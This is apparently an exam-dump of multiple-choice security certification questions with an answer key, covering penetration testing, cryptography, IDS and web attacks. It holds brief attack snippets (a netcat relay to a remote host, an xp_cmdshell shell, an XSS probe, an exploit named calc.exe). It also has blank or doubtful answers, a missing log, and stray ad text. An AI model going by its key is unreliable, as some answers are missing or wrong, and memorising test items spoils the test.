Source: https://www.flowmon.com
Flowmon empowers manufacturers and utility companies to ensure the reliability of their industrial networks
confidently to avoid downtime and disruption of service continuity. This can be achieved by continuous
monitoring and anomaly detection so that malfunctioning devices or security incidents, such as cyber
espionage, zero-days, or malware, can be reported and remedied as quickly as possible.

QUESTION 49
By performing a penetration test, you gained access under a user account. During the test, you established a
connection with your own machine via the SMB service and occasionally entered your login and password in
plaintext. Which file do you have to clean to clear the password?

A. .X session-log
B. .bashrc
C. .profile
D. .bash_history

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
File created by Bash, a Unix-based shell program commonly used on Mac OS X and Linux operating systems;
stores a history of user commands entered at the command prompt; used for viewing old commands that were
executed. BASH_HISTORY files are hidden files with no filename prefix. They always use the filename
.bash_history.
NOTE: Bash is the shell program used by Apple Terminal.
Our goal is to help you understand what a file with a *.bash_history suffix is and how to open it.
The Bash History file type, file format description, and Mac and Linux programs listed on this page are
individually researched and verified by the FileInfo team. We strive for 100% accuracy and only publish
information about file formats that we've tested and validated.

QUESTION 50
Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the
legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also
received many advertisements on his smartphone after installing the app. What is the attack performed on Don
in the above scenario?

A. SMS phishing attack
B. SIM card attack
C. Agent Smith attack
D. Clickjacking

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Agent Smith Attack
Agent Smith attacks are carried out by luring victims into downloading and installing malicious apps designed
and published by attackers in the form of games, photo editors, or other attractive tools from third-party app
stores such as 9Apps. Once the user has installed the app, the core malicious code inside the application
infects or replaces the legitimate apps in the victim's mobile device through C&C commands. The deceptive application
replaces legitimate apps such as WhatsApp, SHAREit, and MX Player with similar infected versions. The
application sometimes also appears to be an authentic Google product such as Google Updater or Themes.
The attacker then produces a massive volume of irrelevant and fraudulent advertisements on the victim's
device through the infected app for financial gain. Attackers exploit these apps to steal critical information such
as personal information, credentials, and bank details, from the victim's mobile device through C&C
commands.

QUESTION 51
What is the difference between the AES and RSA algorithms?

A. Both are symmetric algorithms, but AES uses 256-bit keys.
B. AES is asymmetric, which is used to create a public/private key pair.
RSA is symmetric, which is used to encrypt data.
C. Both are asymmetric algorithms, but RSA uses 1024-bit keys.
D. RSA is asymmetric, which is used to create a public/private key pair.
AES is symmetric, which is used to encrypt data.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 52
What is the name of the international standard that establishes a baseline level of confidence in the security
functionality of IT products by providing a set of requirements for evaluation?

A. Blue Book
B. ISO 26029
C. Common Criteria
D. The Wassenaar Agreement

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 53
One way to defeat a multi-level security solution is to leak data via

A. a bypass regulator.
B. steganography.
C. a covert channel.
D. asymmetric routing.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 54
Which of the following conditions must be given to allow a tester to exploit a Cross-Site Request Forgery
(CSRF) vulnerable web application?

A. The victim user must open the malicious link with an Internet Explorer prior to version 8.
B. The session cookies generated by the application do not have the HttpOnly flag set.
C. The victim user must open the malicious link with a Firefox prior to version 3.
D. The web application should not use random tokens.

Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 55
What is the main difference between a "Normal" SQL Injection and a "Blind" SQL Injection vulnerability?

A. The request to the web server is not visible to the administrator of the vulnerable application.
B. The attack is called "Blind" because, although the application properly filters user input, it is still
vulnerable to code injection.
C. The successful attack does not show an error message to the administrator of the affected application.
D. The vulnerable application does not display errors with information about the injection results to the
attacker.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 56
During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The
tester assumes that the service is running with Local System account. How can this weakness be exploited to
access the system?

A. Using the Metasploit psexec module setting the SA / Admin credential
B. Invoking the stored procedure xp_shell to spawn a Windows command shell
C. Invoking the stored procedure cmd_shell to spawn a Windows command shell
D. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 57
The precaution of prohibiting employees from bringing personal computing devices into a facility is what type of
security control?

A. Physical
B. Procedural
C. Technical
D. Compliance

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 58
A pentester gains access to a Windows application server and needs to determine the settings of the built-in
Windows firewall. Which command would be used?

A. Netsh firewall show config
B. WMIC firewall show config
C. Net firewall showconfig
D. Ipconfig firewall showconfig

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 59
Which of the following types of firewall inspects only header information in network traffic?

A. Packet filter
B. Stateful inspection
C. Circuit-level gateway
D. Application-level gateway

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 60
During a penetration test, the tester conducts an ACK scan using NMAP against the external interface of the
DMZ firewall. NMAP reports that port 80 is unfiltered. Based on this response, which type of packet inspection
is the firewall conducting?

A. Host
B. Stateful
C. Stateless
D. Application

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 61
Firewalk has just completed the second phase (the scanning phase) and a technician receives the output
shown below. What conclusions can be drawn based on these scan results?

TCP port 21 no response
TCP port 22 no response
TCP port 23 Time-to-live exceeded

A. The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.
B. The lack of response from ports 21 and 22 indicate that those services are not running on the destination
server.
C. The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the
firewall.
D. The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond
with a TTL error.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 62
Which of the following is an example of an asymmetric encryption implementation?

A. SHA1
B. PGP
C. 3DES
D. MD5

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 63
A hacker was able to sniff packets on a company's wireless network. The following information was
discovered:
The Key: 10110010 01001011
The Cyphertext: 01100101 01011010

Using the Exclusive OR, what was the original message?

A. 00101000 11101110
B. 11010111 00010001
C. 00001101 10100100
D. 11110010 01011011

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 64
Which of the following cryptography attack methods is usually performed without the use of a computer?

A. Ciphertext-only attack
B. Chosen key attack
C. Rubber hose attack
D. Rainbow table attack

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 65
Which of the following is a strong post designed to stop a car?

A. Gate
B. Fence
C. Bollard
D. Reinforced rebar

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 66
A Network Administrator was recently promoted to Chief Security Officer at a local university. One of the
employee's new responsibilities is to manage the implementation of an RFID card access system to a new
server room on campus. The server room will house student enrollment information that is securely backed up
to an off-site location.

During a meeting with an outside consultant, the Chief Security Officer explains that he is concerned that the
existing security controls have not been designed properly. Currently, the Network Administrator is responsible
for approving and issuing RFID card access to the server room, as well as reviewing the electronic access logs
on a weekly basis.

Which of the following is an issue with the situation?

A. Segregation of duties
B. Undue influence
C. Lack of experience
D. Inadequate disaster recovery plan

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 67
What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel
room?

A. Set a BIOS password.
B. Encrypt the data on the hard drive.
C. Use a strong logon password to the operating system.
D. Back up everything on the laptop and store the backup in a safe place.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 68
In the software security development life cycle process, threat modeling occurs in which phase?

A. Design
B. Requirements
C. Verification
D. Implementation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 69
A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The
alert was generated because a large number of packets were coming into the network over ports 20 and 21.
During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this
situation?

A. True negatives
B. False negatives
C. True positives
D. False positives

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 70
Which of the following techniques does a vulnerability scanner use in order to detect a vulnerability on a target
service?

A. Port scanning
B. Banner grabbing
C. Injecting arbitrary data
D. Analyzing service response

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 71
Which of the following business challenges could be solved by using a vulnerability scanner?

A. Auditors want to discover if all systems are following a standard naming convention.
B. A web server was compromised and management needs to know if any further systems were
compromised.
C. There is an emergency need to remove administrator access from multiple machines for an employee that
quit.
D. There is a monthly requirement to test corporate compliance with host application usage and security
policies.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 72
A security policy will be more accepted by employees if it is consistent and has the support of

A. coworkers.
B. executive management.
C. the security officer.
D. a supervisor.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 73
A company has hired a security administrator to maintain and administer Linux and Windows-based systems.
Written in the nightly report file is the following:

Firewall log files are at the expected value of 4 MB. The current time is 12am. Exactly two hours later the size
has decreased considerably. Another hour goes by and the log files have shrunk in size again.

Which of the following actions should the security administrator take?

A. Log the event as suspicious activity and report this behavior to the incident response team immediately.
B. Log the event as suspicious activity, call a manager, and report this as soon as possible.
C. Run an anti-virus scan because it is likely the system is infected by malware.
D. Log the event as suspicious activity, continue to investigate, and act according to the site's security policy.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 74
Which type of scan measures a person's external features through a digital video camera?

A. Iris scan
B. Retinal scan
C. Facial recognition scan
D. Signature kinetics scan

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 75
WPA2 uses AES for wireless data encryption at which of the following encryption levels?

A. 64 bit and CCMP
B. 128 bit and CRC
C. 128 bit and CCMP
D. 128 bit and TKIP

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 76
An attacker uses a communication channel within an operating system that is neither designed nor intended to
transfer information. What is the name of the communications channel?

A. Classified
B. Overt
C. Encrypted
D. Covert

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 77
What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack?

A. Injecting parameters into a connection string using semicolons as a separator
B. Inserting malicious Javascript code into input parameters
C. Setting a user's session identifier (SID) to an explicit known value
D. Adding multiple parameters with the same name in HTTP requests

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 78
A newly discovered flaw in a software application would be considered which kind of security vulnerability?

A. Input validation flaw
B. HTTP header injection vulnerability
C. 0-day vulnerability
D. Time-to-check to time-to-use flaw

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 79
During a penetration test, a tester finds that the web application being analyzed is vulnerable to Cross Site
Scripting (XSS). Which of the following conditions must be met to exploit this vulnerability?

A. The web application does not have the secure flag set.
B. The session cookies do not have the HttpOnly flag set.
C. The victim user should not have an endpoint security solution.
D. The victim's browser must have ActiveX technology enabled.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 80
The use of alert thresholding in an IDS can reduce the volume of repeated alerts, but introduces which of the
following vulnerabilities?

A. An attacker, working slowly enough, can evade detection by the IDS.
B. Network packets are dropped if the volume exceeds the threshold.
C. Thresholding interferes with the IDS' ability to reassemble fragmented packets.
D. The IDS will not distinguish among packets originating from different sources.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 81
What is the main advantage that a network-based IDS/IPS system has over a host-based solution?

A. They do not use host system resources.
B. They are placed at the boundary, allowing them to inspect all traffic.
C. They are easier to install and configure.
D. They will not interfere with user interfaces.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 82
The network administrator for a company is setting up a website with e-commerce capabilities. Packet sniffing
is a concern because credit card information will be sent electronically over the Internet. Customers visiting the
site will need to encrypt the data with HTTPS. Which type of certificate is used to encrypt and decrypt the data?

A. Asymmetric
B. Confidential
C. Symmetric
D. Non-confidential

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 83
When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following?

A. Drops the packet and moves on to the next one
B. Continues to evaluate the packet until all rules are checked
C. Stops checking rules, sends an alert, and lets the packet continue
D. Blocks the connection with the source IP address in the packet

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 84
Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them?

A. Detective
B. Passive
C. Intuitive
D. Reactive

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 85
An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did
not contain management or control packets in the submitted traces. Which of the following is the most likely
reason for lack of management or control packets?

A. The wireless card was not turned on.
B. The wrong network card drivers were in use by Wireshark.
C. On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode.
D. Certain operating systems and adapters do not collect the management or control packets.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 86
From the two screenshots below, which of the following is occurring?

First one:
[10.0.0.253]# nmap -sP 10.0.0.0/24
Starting Nmap
Host 10.0.0.1 appears to be up.
MAC Address: 00:09:5B:29:FD:96 (Netgear)
Host 10.0.0.2 appears to be up.
MAC Address: 00:0F:B5:96:38:5D (Netgear)
Host 10.0.0.4 appears to be up.
Host 10.0.0.5 appears to be up.
MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds

Second one:
[10.0.0.252]# nmap -sO 10.0.0.2
Starting Nmap 4.01 at 2006-07-14 12:56 BST
Interesting protocols on 10.0.0.2:
(The 251 protocols scanned but not shown below are in state: closed)
PROTOCOL STATE SERVICE
1 open icmp
2 open|filtered igmp
6 open tcp
17 open udp
255 open|filtered unknown
Nmap finished: 1 IP address (1 host up) scanned in 1.259 seconds

A. 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against
10.0.0.2.
B. 10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
C. 10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
D. 10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 87
Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will decode
a packet capture and extract the voice conversations?

A. Cain
B. John the Ripper
C. Nikto
D. Hping

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 88
Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?

A. They are written in Java.
B. They send alerts to security monitors.
C. They use the same packet analysis engine.
D. They use the same packet capture utility.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 89
Which set of access control solutions implements two-factor authentication?

A. USB token and PIN
B. Fingerprint scanner and retina scanner
C. Password and PIN
D. Account and password

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 90
A security engineer has been asked to deploy a secure remote access solution that will allow employees to
connect to the company's internal network. Which of the following can be implemented to minimize the
opportunity for the man-in-the-middle attack to occur?

A. SSL
B. Mutual authentication
C. IPSec
D. Static IP addresses

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 91
A person approaches a network administrator and wants advice on how to send encrypted email from home.
The end user does not want to have to pay for any license fees or manage server services. Which of the
following is the most secure encryption protocol that the network administrator should recommend?

A. IP Security (IPSEC)
B. Multipurpose Internet Mail Extensions (MIME)
C. Pretty Good Privacy (PGP)
D. Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 92
To send a PGP encrypted message, which piece of information from the recipient must the sender have before
encrypting the message?

A. Recipient's private key
B. Recipient's public key
C. Master encryption key
D. Sender's public key

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 93
An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to
compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish
this?

A. g++ hackersExploit.cpp -o calc.exe
B. g++ hackersExploit.py -o calc.exe
C. g++ -i hackersExploit.pl -o calc.exe
D. g++ --compile -i hackersExploit.cpp -o calc.exe

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 94
On a Linux device, which of the following commands will start the Nessus client in the background so that the
Nessus server can be configured?

A. nessus +
B. nessus *s
C. nessus &
D. nessus -d

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 95
Which of the following tools will scan a network to perform vulnerability checks and compliance auditing?

A. NMAP
B. Metasploit
C. Nessus
D. BeEF

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 96
What is the best defense against privilege escalation vulnerability?

A. Patch systems regularly and upgrade interactive login privileges at the system administrator level.
B. Run administrator and applications on least privileges and use a content registry for tracking.
C. Run services with least privileged accounts and implement multi-factor authentication and authorization.
D. Review user roles and administrator privileges for maximum utilization of automation services.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 97
How can a rootkit bypass Windows 7 operating system's kernel mode, code signing policy?

A. Defeating the scanner from detecting any code change at the kernel
B. Replacing patch system calls with its own version that hides the rootkit (attacker's) actions
C. Performing common services for the application process and replacing real applications with fake ones
D. Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 98
Which of the following items of a computer system will an anti-virus program scan for viruses?

A. Boot Sector
B. Deleted Files
C. Windows Process List
D. Password Protected Files

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 99
Which protocol and port number might be needed in order to send log messages to a log analysis tool that
resides behind a firewall?

A. UDP 123
B. UDP 541
C. UDP 514
D. UDP 415

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 100
A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester pivot using
Metasploit?

A. Issue the pivot exploit and set the meterpreter.
B. Reconfigure the network settings in the meterpreter.
C. Set the payload to propagate through the meterpreter.
D. Create a route statement in the meterpreter.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 101
What is the outcome of the command "nc -l -p 2222 | nc 10.1.0.43 1234"?

A. Netcat will listen on the 10.1.0.43 interface for 1234 seconds on port 2222.
B. Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234.
C. Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222.
D. Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 102
Which of the following is a client-server tool utilized to evade firewall inspection?

A. tcp-over-dns
B. kismet
C. nikto
D. hping

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 103
Which tool is used to automate SQL injections and exploit a database by forcing a given web application to
connect to another database controlled by a hacker?

A. DataThief
B. NetCat
C. Cain and Abel
D. SQLInjector

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 104
A tester has been hired to do a web application security test. The tester notices that the site is dynamic and
must make use of a back end database. In order for the tester to see if SQL injection is possible, what is the
first character that the tester should use to attempt breaking a valid SQL request?

A. Semicolon
B. Single quote
C. Exclamation mark
D. Double quote

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 105
Which of the following identifies the three modes in which Snort can be configured to run?

A. Sniffer, Packet Logger, and Network Intrusion Detection System
B. Sniffer, Network Intrusion Detection System, and Host Intrusion Detection System
C. Sniffer, Host Intrusion Prevention System, and Network Intrusion Prevention System
D. Sniffer, Packet Logger, and Host Intrusion Prevention System

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 106
When using Wireshark to acquire packet capture on a network, which device would enable the capture of all
traffic on the wire?

A. Network tap
B. Layer 3 switch
C. Network bridge
D. Application firewall

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 107
Which of the following programming languages is most vulnerable to buffer overflow attacks?

A. Perl
B. C++
C. Python
D. Java

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 108
Smart cards use which protocol to transfer the certificate in a secure manner?

A. Extensible Authentication Protocol (EAP)
B. Point to Point Protocol (PPP)
C. Point to Point Tunneling Protocol (PPTP)
D. Layer 2 Tunneling Protocol (L2TP)

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 109
Which of the following is a hashing algorithm?

A. MD5
B. PGP
C. DES
D. ROT13

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 110
Which of the following problems can be solved by using Wireshark?

A. Tracking version changes of source code
B. Checking creation dates on all webpages on a server
C. Resetting the administrator password on multiple systems
D. Troubleshooting communication resets between two systems

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 111
What is the correct PCAP filter to capture all TCP traffic going to or from host 192.168.0.125 on port 25?

A. tcp.src == 25 and ip.host == 192.168.0.125
B. host 192.168.0.125:25
C. port 25 and host 192.168.0.125
D. tcp.port == 25 and ip.host == 192.168.0.125

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 112
Which tool would be used to collect wireless packet data?

A. NetStumbler
B. John the Ripper
C. Nessus
D. Netcat

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 113
Which of the following is an example of two factor authentication?

A. PIN Number and Birth Date
B. Username and Password
C. Digital Certificate and Hardware Token
D. Fingerprint and Smartcard ID

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 114
Diffie-Hellman (DH) groups determine the strength of the key used in the key exchange process. Which of the
following is the correct bit size of the Diffie-Hellman (DH) group 5?

A. 768 bit key
B. 1025 bit key
C. 1536 bit key
D. 2048 bit key

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 115
After gaining access to the password hashes used to protect access to a web based application, knowledge of
which cryptographic algorithms would be useful to gain access to the application?

A. SHA1
B. Diffie-Helman
C. RSA
D. AES

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 116
What statement is true regarding LM hashes?

A. LM hashes consist of 48 hexadecimal characters.
B. LM hashes are based on AES128 cryptographic standard.
C. Uppercase characters in the password are converted to lowercase.
D. LM hashes are not generated when the password length exceeds 15 characters.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 117
A developer for a company is tasked with creating a program that will allow customers to update their billing and
shipping information. The billing address field used is limited to 50 characters. What pseudo code would the
developer use to avoid a buffer overflow attack on the billing address field?

A. if (billingAddress = 50) {update field} else exit
B. if (billingAddress != 50) {update field} else exit
C. if (billingAddress >= 50) {update field} else exit
D. if (billingAddress <= 50) {update field} else exit

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 118
A security analyst in an insurance company is assigned to test a new web application that will be used by clients
to help them choose and apply for an insurance plan. The analyst discovers that the application is developed in
ASP scripting language and it uses MSSQL as a database backend. The analyst locates the application's
search form and introduces the following code in the search input field:

IMG SRC=vbscript:msgbox("Vulnerable");> originalAttribute="SRC" originalPath="vbscript:msgbox("Vulnerable");>"

When the analyst submits the form, the browser returns a pop-up window that says "Vulnerable".

Which web application vulnerability did the analyst discover?

A. Cross-site request forgery
B. Command injection
C. Cross-site scripting
D. SQL injection

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 119
A security administrator notices that the log file of the company's webserver contains suspicious entries:

Based on source code analysis, the analyst concludes that the login.php script is vulnerable to

A. command injection.
B. SQL injection.
C. directory traversal.
D. LDAP injection.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 120
Which solution can be used to emulate computer services, such as mail and ftp, and to capture information
related to logins or actions?

A. Firewall
B. Honeypot
C. Core server
D. Layer 4 switch

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 121
Which command lets a tester enumerate alive systems in a class C network via ICMP using native Windows
tools?

A. ping 192.168.2.
B. ping 192.168.2.255
C. for %V in (1 1 255) do PING 192.168.2.%V
D. for /L %V in (1 1 254) do PING -n 1 192.168.2.%V | FIND /I "Reply"

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 122
What results will the following command yield: 'NMAP -sS -O -p 123-153 192.168.100.3'?

A. A stealth scan, opening port 123 and 153
B. A stealth scan, checking open ports 123 to 153
C. A stealth scan, checking all open ports excluding ports 123 to 153
D. A stealth scan, determine operating system, and scanning ports 123 to 153

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 123
Which of the following parameters enables NMAP's operating system detection feature?

A. NMAP -sV
B. NMAP -oS
C. NMAP -sR
D. NMAP -O

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 124
Which of the following open source tools would be the best choice to scan a network for potential targets?

A. NMAP
B. NIKTO
C. CAIN
D. John the Ripper

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 125
A hacker is attempting to see which IP addresses are currently active on a network. Which NMAP switch would
the hacker use?

A. -sO
B. -sP
C. -sS
D. -sU

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 126
A hacker, who posed as a heating and air conditioning specialist, was able to install a sniffer program in a
switched environment network. Which attack could the hacker use to sniff all of the packets in the network?

A. Fraggle
B. MAC Flood
C. Smurf
D. Tear Drop

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 127
Which of the following settings enables Nessus to detect when it is sending too many packets and the network
pipe is approaching capacity?

A. Netstat WMI Scan
B. Silent Dependencies
C. Consider unscanned ports as closed
D. Reduce parallel connections on congestion

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 128
How does an operating system protect the passwords used for account logins?

A. The operating system performs a one-way hash of the passwords.
B. The operating system stores the passwords in a secret file that users cannot find.
C. The operating system encrypts the passwords, and decrypts them when needed.
D. The operating system stores all passwords in a protected segment of non-volatile memory.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 129
Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the
chosen service call interruptions when they are being run?

A. Cavity virus
B. Polymorphic virus
C. Tunneling virus
D. Stealth virus

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 130
An attacker has been successfully modifying the purchase price of items purchased on the company's web site.
The security administrators verify the web server and Oracle database have not been compromised directly.
They have also verified the Intrusion Detection System (IDS) logs and found no attacks that could have caused
this. What is the most likely way the attacker has been able to modify the purchase price?

A. By using SQL injection
B. By changing hidden form values
C. By using cross site scripting
D. By utilizing a buffer overflow attack

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 131
Which tool can be used to silently copy files from USB devices?

A. USB Grabber
B. USB Dumper
C. USB Sniffer
D. USB Snoopy

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 132
Which of the following is used to indicate a single-line comment in structured query language (SQL)?

A. --
B. ||
C. %%
D. ''

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 133
A security engineer is attempting to map a company's internal network. The engineer enters in the following
NMAP command:

NMAP -n -sS -P0 -p 80 ***.***.**.**

What type of scan is this?

A. Quick scan
B. Intense scan
C. Stealth scan
D. Comprehensive scan

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 134
What is the broadcast address for the subnet 190.86.168.0/22?

A. 190.86.168.255
B. 190.86.255.255
C. 190.86.171.255
D. 190.86.169.255

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 135
A company is using Windows Server 2003 for its Active Directory (AD). What is the most efficient way to crack
the passwords for the AD users?

A. Perform a dictionary attack.
B. Perform a brute force attack.
C. Perform an attack with a rainbow table.
D. Perform a hybrid attack.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 136
Which of the following does proper basic configuration of snort as a network intrusion detection system require?

A. Limit the packets captured to the snort configuration file.
B. Capture every packet on the network segment.
C. Limit the packets captured to a single segment.
D. Limit the packets captured to the /var/log/snort directory.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 137
How is sniffing broadly categorized?

A. Active and passive
B. Broadcast and unicast
C. Unmanaged and managed
D. Filtered and unfiltered

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 138
What are the three types of authentication?

A. Something you: know, remember, prove
B. Something you: have, know, are
C. Something you: show, prove, are
D. Something you: show, have, prove

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 139
The use of technologies like IPSec can help guarantee the following: authenticity, integrity, confidentiality and

A. non-repudiation.
B. operability.
C. security.
D. usability.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 140
What is the main disadvantage of the scripting languages as opposed to compiled programming languages?

A. Scripting languages are hard to learn.
B. Scripting languages are not object-oriented.
C. Scripting languages cannot be used to create graphical user interfaces.
D. Scripting languages are slower because they require an interpreter to run the code.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 141
A botnet can be managed through which of the following?

A. IRC
B. E-Mail
C. Linkedin and Facebook
D. A vulnerable FTP server

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 142
Fingerprinting VPN firewalls is possible with which of the following tools?

A. Angry IP
B. Nikto
C. Ike-scan
D. Arp-scan

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 143
What is a successful method for protecting a router from potential smurf attacks?

A. Placing the router in broadcast mode
B. Enabling port forwarding on the router
C. Installing the router outside of the network's firewall
D. Disabling the router from accepting broadcast ping messages

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 144
Which of the following is optimized for confidential communications, such as bidirectional voice and video?

A. RC4
B. RC5
C. MD4
D. MD5

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 145
Advanced encryption standard is an algorithm used for which of the following?

A. Data integrity
